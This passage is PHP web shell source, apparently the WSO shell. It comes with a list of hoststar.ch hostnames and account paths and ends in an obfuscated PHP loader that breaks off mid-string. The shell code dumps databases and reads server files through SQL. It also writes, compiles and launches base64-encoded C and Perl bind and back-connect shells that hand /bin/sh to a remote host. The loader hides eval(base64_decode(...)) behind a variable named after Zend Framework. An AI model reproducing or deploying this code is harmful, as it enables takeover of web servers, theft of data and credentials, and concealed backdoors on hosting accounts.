@mysql_connect($host,$user,$pass,true) ) return true; break; case 'pgsql': $host = explode(':', $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; break; } return false; } function selectdb($db) { switch($this->type) { case 'mysql': if (@mysql_select_db($db))return true; break; } return false; } function query($str) { switch($this->type) { case 'mysql': return $this->res = @mysql_query($str); break; case 'pgsql': return $this->res = @pg_query($this->link,$str); break; } return false; } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type) { case 'mysql': return @mysql_fetch_assoc($res); break; case 'pgsql': return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch($this->type) { case 'mysql': return $this->query("SHOW databases"); break; case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break; } return false; } function listTables() { switch($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES'); break; case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); break; } return false; } function error() { switch($this->type) { case 'mysql': return @mysql_error(); break; case 'pgsql': return @pg_last_error(); break; } return false; } function setCharset($str) { switch($this->type) { case 'mysql': if(function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link); else $this->query('SET CHARSET '.$str); break; case 'pgsql': return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch($this->type) { case 'mysql': return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file")); break; case 'pgsql': $this->query("CREATE TABLE hard2(file text);COPY hard2 FROM '".addslashes($str)."';select file from hard2;"); $r=array(); while($i=$this->fetch()) $r[] = $i['file']; $this->query('drop table hard2'); return array('file'=>implode("\n",$r)); break; } return false; } function dump($table, $fp = false) { switch($this->type) { case 'mysql': $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); $create = mysql_fetch_array($res); $sql = $create[1].";\n"; if($fp) fwrite($fp, $sql); else echo($sql); $this->query('SELECT * FROM `'.$table.'`'); $i = 0; $head = true; while($â = $this->fetch()) { $sql = ''; if($i % 1000 == 0) { $head = true; $sql = ";\n\n"; } $columns = array(); foreach($â as $k=>$v) { if($v === null) $â[$k] = "NULL"; elseif(is_int($v)) $â[$k] = $v; else $â[$k] = "'".@mysql_real_escape_string($v)."'"; $columns[] = "`".$k."`"; } if($head) { $sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $â).')'; $head = false; } else $sql .= "\n\t,(".implode(", ", $â).')'; if($fp) fwrite($fp, $sql); else echo($sql); $i++; } if(!$head) if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n"); break; case 'pgsql': $this->query('SELECT * FROM '.$table); while($â = $this->fetch()) { $columns = array(); foreach($â as $k=>$v) { $â[$k] = "'".addslashes($v)."'"; $columns[] = $k; } $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $â).');'."\n"; if($fp) fwrite($fp, $sql); else echo($sql); } break; } return false; } }; $db = new DbClass($_POST['type']); if((@$_POST['p2']=='download') && (@$_POST['p1']!='select')) { $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); $db->selectdb($_POST['sql_base']); switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } if(empty($_POST['file'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=dump.sql"); header("Content-Type: text/plain"); foreach($_POST['tbl'] as $v) $db->dump($v); exit; } elseif($fp = @fopen($_POST['file'], 'w')) { foreach($_POST['tbl'] as $v) $db->dump($v, $fp); fclose($fp); unset($_POST['p2']); } else die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>'); } hardHeader(); echo " <h1>Sql browser</h1><div class=content> <form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr> <td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr> <input type=hidden name=ne value=''><input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'> <td><select name='type'><option value='mysql' "; if(@$_POST['type']=='mysql')echo 'selected'; echo ">MySql</option><option value='pgsql' "; if(@$_POST['type']=='pgsql')echo 'selected'; echo ">PostgreSql</option></select></td> <td><input type=text name=sql_host value=\"". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."\"></td> <td><input type=text name=sql_login value=\"". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."\"></td> <td><input type=text name=sql_pass value=\"". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."\"></td><td>"; $tmp = "<input type=text name=sql_base value=''>"; if(isset($_POST['sql_host'])){ if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } $db->listDbs(); echo "<select name=sql_base><option value=''></option>"; while($â = $db->fetch()) { list($key, $value) = each($â); echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>'; } echo '</select>'; } else echo $tmp; }else echo $tmp; echo "</td> <td><input type=submit value='>>' onclick='fs(d.sf);'></td> <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td> </tr> </table> <script> s_db='".@addslashes($_POST['sql_base'])."'; function fs(f) { if(f.sql_base.value!=s_db) { f.onsubmit = function() {}; if(f.p1) f.p1.value=''; if(f.p2) f.p2.value=''; if(f.p3) f.p3.value=''; } } function st(t,l) { d.sf.p1.value = 'select'; d.sf.p2.value = t; if(l && d.sf.p3) d.sf.p3.value = l; d.sf.submit(); } function is() { for(i=0;i<d.sf.elements['tbl[]'].length;++i) d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked; } </script>"; if(isset($db) && $db->link){ echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; if(!empty($_POST['sql_base'])){ $db->selectdb($_POST['sql_base']); echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; $tbls_res = $db->listTables(); while($â = $db->fetch($tbls_res)) { list($key, $value) = each($â); if(!empty($_POST['sql_count'])) $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); $value = htmlspecialchars($value); echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?' ':" <small>({$n['n']})</small>") . "</nobr><br>"; } echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; if(@$_POST['p1'] == 'select') { $_POST['p1'] = 'query'; $_POST['p3'] = $_POST['p3']?$_POST['p3']:1; $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); $num = $db->fetch(); $pages = ceil($num['n'] / 30); echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">"; echo " of $pages"; if($_POST['p3'] > 1) echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>< Prev</a>"; if($_POST['p3'] < $pages) echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next ></a>"; $_POST['p3']--; if($_POST['type']=='pgsql') $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); else $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; echo "<br><br>"; } if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) { $db->query(@$_POST['p2']); if($db->res !== false) { $title = false; echo '<table width=100% cellspacing=1 cellpadding=2 class=main>'; $line = 1; while($â = $db->fetch()) { if(!$title) { echo '<tr>'; foreach($â as $key => $value) echo '<th>'.$key.'</th>'; reset($â); $title=true; echo '</tr><tr>'; $line = 2; } echo '<tr class="l'.$line.'">'; $line = $line==1?2:1; foreach($â as $key => $value) { if($value == null) echo '<td><i>null</i></td>'; else echo '<td>'.nl2br(htmlspecialchars($value)).'</td>'; } echo '</tr>'; } echo '</table>'; } else { echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>'; } } echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>"; if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile')) echo htmlspecialchars($_POST['p2']); echo "</textarea><br/><input type=submit value='Execute'>"; echo "</td></tr>"; } echo "</table></form><br/>"; if($_POST['type']=='mysql') { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if($db->fetch()) echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; } if(@$_POST['p1'] == 'loadfile') { $file = $db->loadFile($_POST['p2']); echo '<br/><pre class=ml1>'.htmlspecialchars($file['file']).'</pre>'; } } else { echo htmlspecialchars($db->error()); } echo '</div>'; hardFooter(); } function actionNetwork() { hardHeader(); $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9"; $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; echo "<h1>Network tools</h1><div class=content> <form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'> <span>Bind port to /bin/sh</span><br/> Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value='>>'> </form> <form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'> <span>Back-connect to</span><br/> Server: <input type='text' name='server' value=". $_SERVER['REMOTE_ADDR'] ."> Port: <input type='text' name='port' value='31337'> Using: <select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value='>>'> </form><br>"; if(isset($_POST['p1'])) { function cf($f,$t) { $w=@fopen($f,"w") or @function_exists('file_put_contents'); if($w) { @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t)); @fclose($w); } } if($_POST['p1'] == 'bpc') { cf("/tmp/bp.c",$bind_port_c); $â = ex("gcc -o /tmp/bp /tmp/bp.c"); @unlink("/tmp/bp.c"); $â .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &"); echo "<pre class=ml1>$â".ex("ps aux | grep bp")."</pre>"; } if($_POST['p1'] == 'bpp') { cf("/tmp/bp.pl",$bind_port_p); $â = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &"); echo "<pre class=ml1>$â".ex("ps aux | grep bp.pl")."</pre>"; } if($_POST['p1'] == 'bcc') { cf("/tmp/bc.c",$back_connect_c); $â = ex("gcc -o /tmp/bc /tmp/bc.c"); @unlink("/tmp/bc.c"); $â .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &"); echo "<pre class=ml1>$â".ex("ps aux | grep bc")."</pre>"; } if($_POST['p1'] == 'bcp') { cf("/tmp/bc.pl",$back_connect_p); $â = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &"); echo "<pre class=ml1>$â".ex("ps aux | grep bc.pl")."</pre>"; } } echo '</div>'; hardFooter(); } if( empty($_POST['a']) ) if(isset($â) && function_exists('action' . $â)) $_POST['a'] = $â; else $_POST['a'] = 'FilesMan'; if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) call_user_func('action' . $_POST['a']); ?>
login-104.hoststar.ch
/home/www/confixx/html/ttux207
login-112.hoststar.ch
/home/www/confixx/html/ttux223
login-113.hoststar.ch
/home/www/confixx/html/ttux225
login-114.hoststar.ch
/home/www/confixx/html/ttux227
login-115.hoststar.ch
/home/www/confixx/html/ttux229
login-128.hoststar.ch
/home/www/confixx/html/tx255 /home/www/confixx/html/ttux255 /home/www/confixx/html/tx255.tar.gz /home/www/confixx/html/ttux255.tar.gz
<?php $zend_framework="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e"; @error_reporting(0); $zend_framework("", "\x7d\73\x40\145\x76\141\x6c\50\x40\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x4a\107\x56\62YTFmWTJiYWsxY3owaXIgPSAiXHg2NlwxNjVceDZlXDE0M1x4NzRcMTUxXHg2ZlwxNTZceDVmXDE0NVx4NzhcMTUxXHg3M1wxNjRceDczIjsgJGV2YTFmWTJiYWwxY3owaXIgPSAiXHg2ZlwxNDJceDVmXDE2M1x4NzRcMTQxXHg3MlwxNjQiOyAkZXZhMWZZMmJhbDFjejhpciA9ICJceDYzXDE1N1x4NjRcMTQ1XHg3OFw2Mlx4MzIiOyBpZigkZXZhMWZZMmJhazFjejBpcigkZXZhMWZZMmJhbDFjejBpcikgJiYgIWlzc2V0KCRHTE9CQUxTWyRldmExZlkyYmFsMWN6OGlyXSkpIHsNCgkkR0xPQkFMU1skZXZhMWZZMmJhbDFjejhpcl09MTsgCWlmKCEkZXZhMWZZMmJhazFjejBpcigiXHg2NVwxNjZceDYxXDYxXHg2NlwxMzFceDMyXDE0Mlx4NjFcMTUzXHgzMVwxNDNceDU2XDYyXHg2OVwxNjIiKSkgeyBpZighJGV2YTFmWTJiYWsxY3owaXIoIlx4NjVcMTY2XHg2MVw2MVx4NjZcMTMxXHgzMlwxNDJceDYxXDE1M1x4MzFcMTQzXHg1Nlw2MFx4NjlcMTYyIikpIHsNCiBmdW5jdGlvbiBldmExZlkyYmFrMWNWMGlyKCkgew0KIC8vZWNobyBzdGFydA0KDQogaWYoIWlzc2V0KCRHTE9CQUxTWyJhZ2hleDAiXSkpIHsNCgkkR0xPQkFMU1siYWdoZXgwIl09MTsNCiAkZXZhbHNzc2dxdWxWQlRrWkxBY2ggPSAiIjsNCiBpZiAoIWlzc2V0KCRldmExZllsYmFrQmNWU2lyKSkgeyRldmExZllsYmFrQmNWU2lyID0gIjdreUo3a1NLaW9EVFdWV2VSQjNUaWNpTDFVamNtUmlMbjRTS2lBRVRzOTBjdVpsVHo1bVJPdEhXSGRXZlJ0MFp1cG1WUk5UVTJZMk1WWmtUOGgxUm4xWFVMZG1icXhHVTdoMVJuMVhVTGRtYnFaVlV6RWxObU5UVkd4RWVOdDFaemtGY21KeUp1VVROeVpHSnVjaUx4azJjd1JDTGlJQ0t1VkhkbEpISm40U055a21ja1JpTG5zVEtuNGlJbklpTG5Ba2RYNVVjMmRsVHNoRWNNaEhUOHhGZU14MlQ0eGpXa05UVXdWR05kVnpXdlYxV2M5V1Qyd2xicVpWWDNsRWNsaFRUS2RXZjhvRVp6a1ZOZHAyTndaR05WdFZYOGRtUlBGM04xVTJjVlpEWDRsVmNkbFdXS2QyYVpCblp0VkZmTkozTjFVMmNWWkRYNGxWY2RsV1dLZDJhWkJuWnRWa1ZUcEdUWEIxSnVJVE55WkdKdUl5Smk0U04xSW5aazR5SnVreUp1SXlKaTR5SjY0R2ZOcGpiV0JWZElkMFQ3TmpWUUpIVndWMmFOWnpXelFqU01oWFRiZDJNWkJuWnhwSGZORm5hc1ZXZXZwMFp0aGpXbkJIUFoxMU1KcFZYOEZsU014RFJXQjFKdUlUTnlaR0p1SXlKaTRTTjFJblprNHlKdWt5SnVJeUppNHlKQVozVk9GbmRYNUVlTnQxWnprRmNtNW1hV0ZsYjBvRVQ0MTBXbk5UV3daV2M2eFhUNDEwV25OVFd3Wm1ibVprVDR4aldrTlRVd1ZHTmRWeld2VjFXYzlXVDJ3bGF6Y0VUbjRpTTFJblprNHlKbjRpSW5JaUwxVWpjbVJpTG40U0tpQWtkWDVVYzJkbFQ5cG5SUVozTndaR05WdFZYOFZsUk94WFYyWUdiWlpqWjR4a1ZQeFdXMWNHYkV4V1o4bDFTbjlXVDIwa2RteFdaOGwxU245V1RMMVVjcXhXWjU5bVNuMUdPYWRHYzhrVlh6a2tXZHhYVUt4RVBFeEdVbjRpTTFJblprNHlKaWNpTDFVamNtUmlMbjBUTXBOSGNrc1RLaWNpTHlVVGF5WkdKdWNTTjN3Vk0xZ0hYMlFUTWNkek00eDFNMUVEWHpVRGVjTlRNeHdWTjNnSFh5RVRNY2hUTjR4Rk4wRURYd01EZWNaak14d0ZaMmdIWHpRVE1jSm1ONHgxTjJFRFg1WURlY0ZUTXh3Vk8yZ0hYM1FUTWNOVE40eGxNekVEWGlaRGVjRnpOY2RETjR4bE0wRURYM2NEZWNGak5jZFRONHhWTTBFRFhtWkRlY1ZqTXh3MU4wZ0hYeU1UTWNaek40eGxOeEVEWDNVRGVjSnpNeHdsWTJnSFh4Y0RYMlFEZWNaVE14d2xNemdIWDFJVE1jSnpNNHgxTTBFRFg0WURlY0pUTXh3MU4wZ0hYeEVUTWNWek40eGxNeEVEWDRVRGVjUkROeHdGTXpnSFgySVRNY1JtTjR4MU0wRURYM01EZWNOVE54d1ZPMmdIWHlRVE1jWnpONHhsTXlFRFg0VURlY0ZETnh3VlkyZ0hYMVlEWDNVRGVjUkROeHdGWjJnSFh5SVRNY05ETjR4Vk14RURYemNEZWNSak5jUm1ONHgxTTBFRFh4TURlY0pqTXh3Rk8xZ0hYeU1UTWNsek40eGxNeUVEWHpRRGVjTlRNeHdsTTNnSFh3Y1RNY2RUTjR4Vk16RURYek1EZWNGek5jWlRONHhWTjBFRFg0WURlY0pUTXh3VloyZ0hYelFUTWNoak40eEZOMkVEWDBVRGVjTlRNeHdWTjNnSFh5RVRNY2hUTjR4Rk4wRURYd01EZWNaak14d0ZaMmdIWHpRVE1jSm1ONHgxTjBFRFh6UURlY1JETnh3Rk0zZ0hYd2NUTWNkRE40eDFNMEVEWGhkRGVjRnpOY05tTjR4MU0wRURYd01EZWNaVE14d0ZPMGdIWHhFVE1jbHpNNHhWTXdFRFg1WURlY0pETnh3Vk8zZ0hYMklUTWNkaUwxSVRheVpHSnVjeU56Z0hYelVUTWNsak40eFZNeEVEWDNNRGVjTlROeHdWTzNnSFgxRVRNY1J6TjR4MU0xRURYNVlEZWNKRE54d2xOM2dIWDBVVE1jZERONHhGTjBFRFhoWkRlY1ZqTmNkVE40eEZOMEVEWGtaRGVjSlRNeHdWTzJnSFgwRVRNY2xqTjR4Vk15RURYelFEZWNOVE14d2xZMmdIWHlFVE1jTnpNNHhsTTBFRFhtWkRlY0ZUTXh3Rk8wZ0hYeFFUTWNGbU40eGxNd0VEWHpVRGVjQmpNeHcxTjJnSFgwWURYeU1EZWNKRE54d0ZNM2dIWHlJVE1jTnpNNHhWTXpFRFgxY0RlY1pqTXh3VloyZ0hYeU1UTWNsak40eEZOMndWTzJnSFh4RVRNY0ptTjR4Vk14RURYelFEZWNSVE14d1ZPMmdIWDBZRFh5TURlY0pETnh3Rk0zZ0hYeUlUTWNOek00eFZNekVEWDFjRGVjWmpNeHdWWjJnSFh5TVRNY2xqTjR4Rk4yd1ZPMmdIWHhFVE1jSm1ONHhWTXpFRFg1WURlY0ZUTXh3bFoyZ0hYMFlEWHlNRGVjSkROeHdGTTNnSFh5SVRNY056TTR4Vk16RURYMWNEZWNaak14d1ZaMmdIWHlNVE1jWmpONHhsTnlFRFgzUURlY1JETnh3Rk8yZ0hYMklUTWNSbU40eDFNMEVEWGhaRGVjSkRNeHcxTTFnSFh3SVRNY2RqTjR4Rk4yd2xNemdIWHlRVE1jQnpNNHhGTjFFRFh5TURlY0Z6TXh3Vk4zZ0hYMklUTWNWbU40eGxNekVEWGlaRGVjTmpOeHdGTzBnSFh4RVRNY0J6TjR4Rk4yd0ZaMmdIWHpRVE1jRnpNNHhsTXlFRFg0VURlY0p6TXh3Vk8zZ0hYeUlUTWNORE40eDFNeEVEWDFjRGVjWmpNeHdWWjJnSFh6UVRNY0J6TTR4bE55RURYa1pEZWNORE54dzFOMmdIWDBZRFh5TURlY0pETnh3Rk0zZ0hYeUlUTWNOek00eFZNekVEWDFjRGVjWmpNeHdWWjJnSFh5TVRNY0ppTG40U055SW5aazR5SnpZVE1jRjJONHhsTXhFRFgxY0RlY1pqTXh3VloyZ0hYelFUTWNCek00eGxOeUVEWGtaRGVjTkROeHdWWjJnSFh3WURYaFpEZWNKRE54d1ZNemdIWHlFVE1jZGlMMUlUYXlaR0p1Y2lJdWNpTDFJamNtUmlMblV6TmNkek40eDFOeEVEWGxaRGVjUmpOY0p6TTR4bE0wRURYd2NEZWNKak14dzFNemdIWHhNVE1jVnpONHhsTnlFRFhsWkRlY0p6TXh3bE4yZ0hYMklUTWNkRE40eEZOMEVEWDRZRGVjWmpNeHdGWjJnSFh6UVRNY0ZtTjR4Rk4wRURYelVEZWNCak14d1ZOM2dIWDJJVE1jZGlMMUlUYXlaR0p1Y2lJdWNpTDFJamNtUmlMbk1qTnh3VlkzZ0hYeUVUTWNObU40eGxOeEVEWDNVRGVjRnpNeHcxTTNnSFh5QVRNY2hUTjR4bE16RURYNWNEZWNGek5jRnpNNHhsTXpFRFhqWkRlY0pUTXh3Rk8wZ0hYelFUTWNWbU40eEZNMndWWTJnSFh5UVRNY2x6TjR4bE53RURYM1FEZWNSRE54dzFZMmdIWHlFVE1jaERONHhsTXhFRFhpNGlNMVFYYW1SQ0x5VWpacFpHSnNVak1tbG1aa2dTWmpGR2J3Vm1jZmRXWnlCM09pSWpNNHhGTTF3Vk4yZ0hYMFFUTWNabU40eDFNMEVEWDFZRGVjUkROeHdsWjFnSFgwWURYMk1EZWNWRE54dzFNM2dIWHhRVE1jSmpONHhGTTF3MVkyZ0hYeFFUTWNaek40eFZOMEVEWHdRRGVjSkNJOUFpTTFRWGFtUnlPaUkyTTR4Vk0xd2xNeWdIWHhZRFhqVkRlY0pETmNoak00eEZOMUVEWHhZRGVjWmpOeHdWTjJnSFhpQVNQZ0lUTm1sbVprc2pJMVFUTWNsak40eEZNd0VEWDVJRGVjTlROY1ZtTTR4Rk0xd0ZNMGdIWGlBU1BnVWpNbWxtWmtjQ0tzRm1kbHRqSXdJRGVjVnpOY0JqTTR4Rk0yd0ZOMmdIWDBRVE1jUmpNNHhsSWcwREkxSVRheVJHSmdzVE4xa21jbVJpTG5raUluNGlNMWttY21SQ0k5QVNOeUluWmtBeU9uZ0RONHhGTjBFRFhqWkRlY0pUTXh3Rk8wZ0hYeUVUTWNkQ0k5QVNOeWttY21SeU9uSTJNNHhWTTF3Vk95Z0hYeVFEWGtORGVjZENJOUFpTTFrbWNtUnlPblFEVjJZV2ZWdFVUbkFTUGdJVE55WkdKN2NDS3VWbmMwVm1ja2NDSTlBU04xSW5aa3N6SnlVRGRwWkdKc0lUTm1sbVprd1NOeVlXYW1SQ0t1SlhZMFZtY2tzekpnMERJMVVUYXlaR0orYVdZZ0tDRnBjM05sZENna1pYWmhiRlZrUT